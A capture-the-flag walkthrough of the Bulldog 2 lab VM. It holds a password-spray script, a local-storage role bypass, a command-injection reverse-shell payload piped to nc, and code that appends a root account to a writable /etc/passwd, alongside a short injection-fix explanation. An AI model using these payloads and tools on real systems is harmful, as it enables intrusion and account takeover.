
Bulldog 2 target machine practice notes

 ·  ☕ 6 min  ·  ✍️ IceKam

Name: Bulldog: 2

Date release: 18 Jul 2018

Three years have passed since Bulldog Industries suffered multiple data breaches.

In that time they have recovered and rebranded as Bulldog.social, an up-and-coming social media company.

Can you take on this new challenge and gain a foothold on their production web server?

This is a standard boot-to-root. Your only goal is to get into root and see the congratulations message; how you get there is up to you!

Difficulty: intermediate, with some things you may never have seen before. Think everything through carefully :)

I strongly recommend running it on VirtualBox. DHCP is enabled, so you should have no trouble getting it onto your network. It defaults to bridged mode, but feel free to change that.

Download: https://www.vulnhub.com/entry/bulldog-2,246/

Information gathering

Same old routine: nmap.

Find the IP address

$ nmap -sn 192.168.123.1-254
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-31 02:34 CST
Host is up (0.089s latency).
MAC Address: 88:2D:53:0D:85:6B (Unknown)
Nmap scan report for 192.168.123.199
Host is up.
Nmap done: 254 IP addresses (5 hosts up) scanned in 8.20 seconds
  • Target IP found: 192.168.123.199

Scan the target for ports and service versions.

$ nmap -sC -sV -vv -p- 192.168.123.199
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-31 02:34 CST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 02:34
Completed NSE at 02:34, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 02:34
Completed NSE at 02:34, 0.00s elapsed
Initiating ARP Ping Scan at 02:34
Scanning 192.168.123.199 [1 port]
Completed ARP Ping Scan at 02:34, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:34
Completed Parallel DNS resolution of 1 host. at 02:34, 0.00s elapsed
Initiating SYN Stealth Scan at 02:34
Scanning bulldog2.lan (192.168.123.199) [65535 ports]
Discovered open port 80/tcp on 192.168.123.199
SYN Stealth Scan Timing: About 19.61% done; ETC: 02:37 (0:02:07 remaining)
SYN Stealth Scan Timing: About 47.76% done; ETC: 02:37 (0:01:07 remaining)
Completed SYN Stealth Scan at 02:36, 104.58s elapsed (65535 total ports)
Initiating Service scan at 02:36
Scanning 1 service on bulldog2.lan (192.168.123.199)
Completed Service scan at 02:36, 6.01s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.123.199.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 02:36
Completed NSE at 02:36, 0.12s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 02:36
Completed NSE at 02:36, 0.00s elapsed
Nmap scan report for bulldog2.lan (192.168.123.199)
Host is up, received arp-response (0.00032s latency).
Scanned at 2018-10-31 02:34:55 CST for 111s
Not shown: 65534 filtered ports
Reason: 65534 no-responses
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 nginx 1.14.0 (Ubuntu)
|_http-cors: HEAD GET POST PUT DELETE PATCH
|_http-favicon: Unknown favicon MD5: B9AA7C338693424AAE99599BEC875B5F
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Bulldog.social
MAC Address: 08:00:27:7C:BF:A8 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 02:36
Completed NSE at 02:36, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 02:36
Completed NSE at 02:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.93 seconds
           Raw packets sent: 131153 (5.771MB) | Rcvd: 252 (40.006KB)
  • Only port 80 is open, which makes this a bit uncomfortable: everything has to come through the web application.

Information analysis

Source code analysis

Open http://192.168.123.199.
The favicon.ico shows this is a site built on the Angular framework.

Inspecting the page source gives the version:

<app-root _nghost-c0="" ng-version="4.4.7">

  • So the Angular version is 4.4.7.

Proxy analysis

Open Burp Suite and load the /users page through the proxy.
It turns out usernames can be fetched with a plain GET, with no authentication.
The URL is: http://192.168.123.199/users/getUsers?limit=9

  • The response holds user records, over ten thousand of them. With the usernames in hand we can try brute forcing passwords.

Password brute force

Generate the username list

# jq walks the whole document and prints every "username" value, whatever the response layout;
# the original cut -d'"' -f1 pipeline kept only the whitespace before the first quote
$ curl -s 192.168.123.199/users/getUsers | jq -r '.. | .username? // empty' > usernames.txt
$ wc -l usernames.txt
15760 usernames.txt

Brute force with wfuzz

$ wfuzz -w usernames.txt -w /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt \
    -H "Content-Type: application/json" -H "Referer: http://192.168.123.199/login" \
    -d '{"username":"FUZZ", "password": "FUZ2Z"}' -t 20 --hc 401 http://192.168.123.199/users/authenticate
  • With 15760 usernames times 100 passwords this takes a long time; the process is omitted. --hc 401 hides the failed logins, so only successful pairs are printed.
  • The weak credential finally found: eivijay:12345.
  • Log in with it.
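The same enumerate-and-spray procedure in Python, as an added example rather than the original post's commands. The page does not show the exact JSON layout of getUsers, so extract_usernames walks whatever document comes back and SAMPLE_GETUSERS below is a constructed stand-in; spray runs each password across every user against /users/authenticate and, like the wfuzz --hc 401 filter, treats 401 as failure. fake_post replaces the network so the block runs offline; http_post_json is the real poster for use against the box.

```python
"""Enumerate usernames from the getUsers JSON and spray a short password list
against the JSON login endpoint. Added example, not the write-up's own code.
ASSUMPTIONS (not on the page): the response layout of getUsers, and that a
failed login answers 401 while a success answers something else."""
import json
import urllib.error
import urllib.request
from typing import Any, Callable, Dict, Iterable, Iterator, List, Tuple

# Constructed sample in the spirit of the page's data; not the real response.
SAMPLE_GETUSERS: Dict[str, Any] = {
    "success": True,
    "users": [
        {"name": "Vijay Wells", "username": "eivijay", "email": "vijay@example.com", "auth_level": "standard_user"},
        {"name": "Alice Example", "username": "alice", "email": "alice@example.com", "auth_level": "standard_user"},
        {"name": "Alice Again", "username": "alice", "email": "alice2@example.com", "auth_level": "standard_user"},
    ],
}
SAMPLE_PASSWORDS = ["123456", "password", "12345"]


def extract_usernames(doc: Any) -> List[str]:
    """Collect every 'username' value in first-seen order, without duplicates.
    Recursion makes this independent of whether the API returns a bare list
    or wraps it in an object such as {"users": [...]}."""
    seen, out = set(), []

    def walk(node: Any) -> None:
        if isinstance(node, dict):
            name = node.get("username")
            if isinstance(name, str) and name not in seen:
                seen.add(name)
                out.append(name)
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)

    walk(doc)
    return out


def http_post_json(url: str, body: Dict[str, str], timeout: float = 5.0) -> int:
    """Real poster: HTTP status of a JSON POST (HTTPError carries the code)."""
    req = urllib.request.Request(url, data=json.dumps(body).encode(), method="POST",
                                 headers={"Content-Type": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def fake_post(body: Dict[str, str]) -> int:
    """Offline stand-in for the box: only the page's weak credential succeeds."""
    return 200 if (body["username"], body["password"]) == ("eivijay", "12345") else 401


def spray(usernames: Iterable[str], passwords: Iterable[str],
          post: Callable[[Dict[str, str]], int], failure_status: int = 401) -> Iterator[Tuple[str, str, int]]:
    """Yield (user, password, status) for every attempt that is not a failure.
    Password-outer ordering sends one password across all users before the
    next, which trips per-account lockout policies less than user-outer."""
    users = list(usernames)
    for password in passwords:
        for user in users:
            status = post({"username": user, "password": password})
            if status != failure_status:
                yield (user, password, status)


if __name__ == "__main__":
    names = extract_usernames(SAMPLE_GETUSERS)
    for hit in spray(names, SAMPLE_PASSWORDS, fake_post):
        print("valid credential:", hit)   # ('eivijay', '12345', 200)
```

Against the real target, replace fake_post with `lambda body: http_post_json("http://192.168.123.199/users/authenticate", body)` and feed extract_usernames the parsed output of getUsers.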

Local storage privilege bypass

Open Chrome and pull the user record out of local storage:
{"name":"Vijay Wells","username":"eivijay","email":"[email protected]","auth_level":"standard_user"

Change the auth_level field from standard_user to the administrator value master_admin_user:
{"name":"Vijay Wells","username":"eivijay","email":"[email protected]","auth_level":"master_admin_user"

Refresh the page and the admin dashboard at http://192.168.123.199/dashboard appears: the role check lives in the Angular front end and reads a value the client fully controls. The password field on this page can be used to get a shell.

Getting a shell

First start an nc listener

nc -vlp 8922

Shell through the password field. The request below was edited in Burp; let Burp recompute Content-Length after changing the body, since the value shown no longer matches the body that follows.

POST /users/linkauthenticate HTTP/1.1
Host: 192.168.123.199
Content-Length: 50
Accept: application/json, text/plain, */*
Origin: http://192.168.123.199
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
DNT: 1
content-type: application/json
Referer: http://192.168.123.199/dashboard
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
  "username": "icekam",
  "password": "$(rm /tmp/sec;mkfifo /tmp/sec;cat /tmp/sec|/bin/sh -i 2>&1|nc 192.168.123.122 8922 >/tmp/sec)"
}

Reverse shell received

$ nc -vlp 8922
listening on [any] 8922 ...
192.168.123.199: inverse host lookup failed: Unknown host
connect to [192.168.123.122] from (UNKNOWN) [192.168.123.199] 60210
/bin/sh: 0: can't access tty; job control turned off
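The page does not show the server side of /users/linkauthenticate, so the following is an added example and not the Bulldog 2 code. It assumes the endpoint interpolates the submitted password into a command string and hands it to /bin/sh, which is the only way the $(...) payload above can run; `echo` stands in for whatever the real command is. The block shows the expansion, the two fixes (an argv list with no shell, or shlex.quote when a shell string is unavoidable), and a cheap request-log check that flags the payload used above without executing it.

```python
"""Why '$(...)' in the password field produced a shell. Added example for this
write-up; NOT the Bulldog 2 server code, which the page does not show.
ASSUMPTION: the endpoint builds a shell command line from the password and runs
it through /bin/sh. 'echo' is a harmless stand-in for the real command."""
import shlex
import subprocess

# The exact payload from the write-up, kept only for the detection check below.
# It is never executed here.
PAGE_PAYLOAD = "$(rm /tmp/sec;mkfifo /tmp/sec;cat /tmp/sec|/bin/sh -i 2>&1|nc 192.168.123.122 8922 >/tmp/sec)"

SHELL_METACHARS = set("$`;|&<>()\n")


def vulnerable_handler(password: str) -> str:
    """String-built command line run through /bin/sh: the shell expands $(...),
    backticks, ; | & before 'echo' ever sees the text."""
    cmd = f"echo {password}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def quoted_handler(password: str) -> str:
    """If a shell string is unavoidable, shlex.quote() wraps the input as a
    single-quoted literal, so no substitution takes place."""
    cmd = f"echo {shlex.quote(password)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def fixed_handler(password: str) -> str:
    """argv list and no shell: the password reaches 'echo' as one literal argument."""
    return subprocess.run(["echo", password], capture_output=True, text=True).stdout.strip()


def looks_like_injection(value: str) -> bool:
    """Cheap check for command-substitution attempts in request logs; a
    detection aid, not a replacement for keeping user input out of a shell."""
    return any(ch in SHELL_METACHARS for ch in value)


if __name__ == "__main__":
    probe = "$(echo injected)"
    print("vulnerable:", vulnerable_handler(probe))   # injected
    print("quoted    :", quoted_handler(probe))       # $(echo injected)
    print("fixed     :", fixed_handler(probe))        # $(echo injected)
    print("page payload flagged:", looks_like_injection(PAGE_PAYLOAD))   # True
```

The probe uses a harmless `$(echo injected)` instead of the reverse-shell payload, but the mechanism is identical: whatever the shell expands in the vulnerable handler would run as the `node` user, exactly as the mkfifo payload above did.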

Privilege escalation

Upgrade to an interactive TTY

$ python -c 'import pty; pty.spawn("/bin/sh")'
$ /bin/bash
/bin/bash
node@bulldog2:/var/www/node/Bulldog-2-The-Reckoning$

System information gathering

node@bulldog2:/var/www/node/Bulldog-2-The-Reckoning$ pwd
pwd
/var/www/node/Bulldog-2-The-Reckoning
node@bulldog2:/var/www/node/Bulldog-2-The-Reckoning$ cd /tmp
cd /tmp
node@bulldog2:/tmp$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
admin:x:1000:1004:admin:/home/admin:/bin/bash
mongodb:x:111:65534::/home/mongodb:/usr/sbin/nologin
node:x:1001:1005:,,,:/home/node:/bin/bash
  • /etc/passwd turns out to be writable by this user (confirm with ls -l /etc/passwd before touching it), so we can either replace root's password field or append a new UID 0 account, then switch to it and collect the flag.
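An added example of turning the writable /etc/passwd into root, not the commands the original post ran: parse the file, confirm it is writable, append a UID 0 account whose crypt(3) hash sits directly in the password field (so /etc/shadow is never consulted), and list the UID 0 accounts afterwards as a check. The hash is assumed to be generated beforehand, for instance with `openssl passwd -6 'Secret123'`; CRYPT_HASH_PLACEHOLDER is a constructed stand-in rather than a real hash, and SAMPLE_PASSWD is a trimmed copy of the listing above. The demo runs on a temporary copy so nothing on the box is touched until you point add_uid0_user at the real file.

```python
"""Writable /etc/passwd to root: parse, check writability, append a UID 0
account, verify. Added example for this write-up, not the post's own commands.
ASSUMPTIONS: the crypt(3) hash is made elsewhere (e.g. `openssl passwd -6`);
CRYPT_HASH_PLACEHOLDER is a constructed placeholder, not a real hash."""
import os
import tempfile
from dataclasses import dataclass
from typing import List

# Constructed sample, trimmed from the page's /etc/passwd listing.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "admin:x:1000:1004:admin:/home/admin:/bin/bash\n"
    "node:x:1001:1005:,,,:/home/node:/bin/bash\n"
)
CRYPT_HASH_PLACEHOLDER = "$6$constructedsalt$constructedhashvalue"


@dataclass
class PasswdEntry:
    name: str
    passwd: str   # 'x' means "consult /etc/shadow"; a real hash here is used directly
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

    def line(self) -> str:
        return ":".join([self.name, self.passwd, str(self.uid), str(self.gid),
                         self.gecos, self.home, self.shell])


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Strict seven-field parser: a malformed line is an error, because a
    broken /etc/passwd can lock everyone, attacker included, out of the box."""
    entries = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd line: {raw!r}")
        entries.append(PasswdEntry(fields[0], fields[1], int(fields[2]), int(fields[3]),
                                   fields[4], fields[5], fields[6]))
    return entries


def uid0_accounts(text: str) -> List[str]:
    """Every account that is effectively root; the same check a defender runs."""
    return [e.name for e in parse_passwd(text) if e.uid == 0]


def add_uid0_user(path: str, name: str, crypt_hash: str) -> PasswdEntry:
    """Append a root-equivalent account. With the hash in field 2, login never
    looks at /etc/shadow, which is why a writable passwd file alone is enough."""
    if not os.access(path, os.W_OK):
        raise PermissionError(f"{path} is not writable by uid {os.getuid()}")
    with open(path) as fh:
        existing = fh.read()
    if name in {e.name for e in parse_passwd(existing)}:
        raise ValueError(f"account {name!r} already exists")
    entry = PasswdEntry(name, crypt_hash, 0, 0, "", "/root", "/bin/bash")
    separator = "" if (not existing or existing.endswith("\n")) else "\n"
    with open(path, "a") as fh:
        fh.write(separator + entry.line() + "\n")
    return entry


def demo_on_copy(sample: str, name: str, crypt_hash: str) -> List[str]:
    """Run the whole procedure on a temporary copy; return the UID 0 list."""
    with tempfile.NamedTemporaryFile("w", suffix=".passwd", delete=False) as tmp:
        tmp.write(sample)
        path = tmp.name
    try:
        add_uid0_user(path, name, crypt_hash)
        with open(path) as fh:
            return uid0_accounts(fh.read())
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo_on_copy(SAMPLE_PASSWD, "pwn", CRYPT_HASH_PLACEHOLDER))   # ['root', 'pwn']
```

On the target the call is `add_uid0_user("/etc/passwd", "pwn", hash)` with a real hash, followed by `su pwn` and the matching password in the upgraded TTY.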

Takeaways

The difficulty of this box is reasonable; it mainly tests information-gathering skills.


Author: IceKam. Self-styled tea connoisseur, low-end wordsmith.